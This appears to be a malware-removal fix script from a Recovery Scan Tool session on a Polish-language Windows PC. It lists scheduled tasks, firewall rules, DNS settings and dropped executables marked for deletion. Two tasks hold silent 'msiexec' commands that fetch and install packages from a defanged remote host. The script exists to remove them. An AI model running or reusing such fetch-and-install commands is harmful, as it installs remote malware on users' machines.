CloseProcesses:
CreateRestorePoint:
EmptyTemp:
HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\...\MountPoints2: {d28d5708-70a2-11e9-8253-54e1ad37d8c9} - "G:\HiSuiteDownLoader.exe"
HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\...\MountPoints2: {ebcb9655-4114-11e9-8249-54e1ad37d8c9} - "E:\HiSuiteDownLoader.exe"
Startup: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.me vpn.lnk [2018-06-10]
ShortcutTarget: hide.me vpn.lnk -> (Brak pliku)
GroupPolicy: Ograniczenia ? <==== UWAGA
GroupPolicy\User: Ograniczenia ? <==== UWAGA
Task: {02D0BE1F-6DA9-40A6-884A-0117C668FBDB} - System32\Tasks\Opera scheduled Autoupdate 1555496896 => C:\Users\Admin\AppData\Local\Programs\Opera\launcher.exe [1519640 2019-07-03] (Opera Software AS -> Opera Software)
Task: {2DC9C70D-5375-48D3-9C03-2BF318A3D057} - System32\Tasks\{4F04615B-4F86-A938-1472-6495690C244B} => C:\Program Files\Opera\Launcher.exe
Task: {2F1CB3F8-F14C-477A-A08D-719B5BA3B4DB} - System32\Tasks\atuspirahjizy => "msiexec" /q -package hxxps://guardname.net/ireojlqn.vao <==== UWAGA
Task: {3EFC394D-C0A1-41F5-9305-8E9CCDBCAC51} - System32\Tasks\uaieoe => "msiexec" -package hxxps://guardname.net/lnopgvliuepry.ito /q <==== UWAGA
Task: {631A661E-E721-48C3-85B4-9F44BEE0D0B4} - System32\Tasks\GoogleCheckService => C:\Users\Admin\AppData\Local\Programs\Opera\58.0.3135.127\opera.exe <==== UWAGA
Task: {64C1418E-014A-4557-A68D-DB9F826005F9} - System32\Tasks\{55F6BAE8-1E3E-EBC1-ACA9-04F792F189D0} => C:\Users\Admin\YYiiRubU.exe
Task: {AC22B376-CEAA-4841-98CB-FCBA3BD21B8F} - System32\Tasks\{987801ED-4C56-F6FF-CA13-E3A13116E3CD} => C:\Users\Admin\AppData\Local\hUEekkeViYFiD.exe [59904 2018-04-12] (Microsoft Windows -> Microsoft Corporation) <==== UWAGA
Tcpip\..\Interfaces\{00664684-73f1-4cba-aa09-d11d6f3938c9}: [NameServer] 208.67.222.222 208.67.220.220
Tcpip\..\Interfaces\{1f5df075-51bc-4453-827f-885c1e62f828}: [NameServer] 208.67.222.222 208.67.220.220
Tcpip\..\Interfaces\{52bbde83-89fb-4f71-8a72-464448fb44a4}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{52bbde83-89fb-4f71-8a72-464448fb44a4}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{6fd783af-d458-4003-a114-18240951edaf}: [NameServer] 95.216.188.196,185.4.64.13,185.162.128.148,208.67.222.222,208.67.220.220
Tcpip\..\Interfaces\{6fd783af-d458-4003-a114-18240951edaf}: [DhcpNameServer] 150.204.1.2
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://lenovo17win10.msn.com/?pc=LCTE
HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com
SearchScopes: HKU\S-1-5-21-2392927722-2977143306-2196907431-1001 -> DefaultScope {0A2E1844-0585-446D-B39E-4DD1FED6B322} URL =
SearchScopes: HKU\S-1-5-21-2392927722-2977143306-2196907431-1001 -> {0A2E1844-0585-446D-B39E-4DD1FED6B322} URL =
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - Brak pliku
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
2019-01-13 20:52 - 2019-03-23 14:00 - 006387208 _____ () C:\Users\Admin\AppData\Local\dump007.dat
2018-04-12 01:34 - 2018-04-12 01:34 - 000059904 ____N (Microsoft Corporation) C:\Users\Admin\AppData\Local\hUEekkeViYFiD.exe
2018-08-18 15:51 - 2018-08-18 15:51 - 000000002 _____ () C:\Users\Admin\AppData\Local\imw.ini
2018-09-27 15:25 - 2018-04-12 01:34 - 001626536 _____ (Microsoft Corporation) C:\Users\Admin\AppData\Local\user32.dll
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku
AlternateDataStreams: C:\Users\Admin\Desktop\Tobiasz.jpeg:3or4kl4x13tuuug3Byamue2s4b [87]
AlternateDataStreams: C:\Users\Admin\Desktop\Tobiasz.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
FirewallRules: [{A6A5C7A9-027C-4F42-B541-F2D562CDB229}] => (Allow) LPort=8318
FirewallRules: [{03E16E48-3B2F-4299-9D9B-C178D808E40D}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{CF48F6C4-858E-4E73-A933-A71F1F6F4FEE}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{64D280BB-BC56-4A29-8095-97627A02F28D}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{B4E0157D-362D-4F31-93FB-A738B532D361}] => (Allow) C:\WINDOWS\SysWOW64\EdCFORXI.exe (Microsoft Corporation) [Brak podpisu cyfrowego]
FirewallRules: [{37142FAD-4D3C-4991-8CCD-54E2A556D162}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{5B4E7D8A-B6FF-4219-A7B8-84BDA65D21C7}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{0ECE455A-0DF1-4529-85A9-B356C51AB0AB}] => (Allow) C:\Users\Admin\AppData\Local\hUEekkeViYFiD.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{ACD8B314-E01F-476A-AA61-D6C350FEB771}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{F0E66E77-806F-4A19-84BA-1EEBF76D4704}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{E18CB599-659E-4288-855B-035B26940DCD}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{72830BD2-1A95-43F3-BF8F-804003820D45}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{3DF174C1-ABB4-4BD0-A38F-880CB104A5A5}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{D8FCF870-ED67-414A-A813-2786CF4A03B0}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{917D6863-D5F5-4FC0-B1B6-F142306DE630}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{5AA4C11C-BFF9-4D8A-ACD9-462B7A1558DC}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{D21E1A99-3F8B-488B-9092-43E05A791718}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{75C2FF55-35B8-4BBE-8A80-70A97CFDD3B9}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{2AC51EDF-E7AF-4A15-85B3-E36EF0FD0A06}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{47260107-8610-4B2D-86D8-A482C109EE1A}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{6D0E8727-8D15-4B68-96E0-B760C23F4897}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{115C1C19-86D9-4C46-B6A7-06865E5A617D}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{0A851A54-5ADF-45A8-A289-169AF0E4AAA0}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{C7E30ACE-DABD-4219-AAF4-53E3192A3488}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{382BAA1D-2454-4607-AFF9-2013F9C517A5}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{E4A66AE3-F9DD-442C-9DB4-1DC8450A9101}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{9C72FBB1-9B02-4D58-B759-EB46EE0FA165}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{2EB3AE89-1765-4A40-8C2E-AC80BB26DD7E}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{05458F64-71B7-4D7B-B787-50DEF3E7DC17}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{66422008-3EAC-430D-A4F3-E8789E4EBFEA}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{528EC959-68F4-4299-B77A-51BD0FFAB752}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{D24C728C-7AF4-4667-9C60-4AE4BFFDC5BE}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{824589D8-984E-4791-9AA2-0AF6AB96114D}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{BC439E86-3C2D-487D-90CD-A8027DCD0163}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{FA7E57DE-46E9-44CC-90A1-C12FD2953734}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{B27242ED-E50E-4991-BEF1-5D36B6767A8A}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{CCB36B66-169F-48AE-8335-FB65681580C3}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{B2F714ED-70E7-4302-9A1E-317DCD60FD3E}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{EB151E14-9252-43D5-B5D7-95CB5A99BAE1}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{90358491-0F7E-4902-9E7A-387A36921D8B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{BD26266C-9665-49F5-BB53-9A6D5F1440E1}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{15BBFBDA-FC59-4850-BE98-96D862905272}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{183568B8-EC84-4799-A0A0-6118469003BD}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{9C431AB2-41D6-4B90-AF9C-28373F77D83D}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{F04F5A38-DC16-414D-B0AD-BD65FD675285}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{17146151-E038-482B-ABBF-1C65287CF97D}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{0C886FE7-BC52-4F4B-BF80-48350FF7DFC9}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{47A422BE-ADBB-49AD-A26C-F9F2785101BA}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{A3AD3CFA-F373-40E5-818A-DF60D217637B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{45F871DF-A008-4433-8F52-589FA43D706C}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{CC4D3F11-73B5-46C4-AD72-AA8D5A30541B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{408F5652-536C-47D8-A149-D9DEE0526756}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{C9334AA3-9765-4478-A9D6-8F714A7223DF}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{71E63A59-3089-4274-9D33-3AD38A2BD5B6}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{79F00C57-D74A-4787-9048-855974AD2632}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{4AB41BFF-B4BB-470B-9E3C-1D67658152A6}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{E6ADA24F-2F38-4030-BBB1-5F90E4D39666}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{4BEBC431-FB63-4CBF-A456-4ED8E79F2154}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{4C098975-9938-4F0D-BB32-725DC1EA1DC4}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
Hosts:
RemoveProxy:
CMD: netsh int ip reset
CMD: ipconfig /flushdns
FilesInDirectory: C:\Users\Admin\AppData\Local\*.exe;*.dll;*.ini
FilesInDirectory: C:\Users\Admin\*.exe;*.dll;*.ini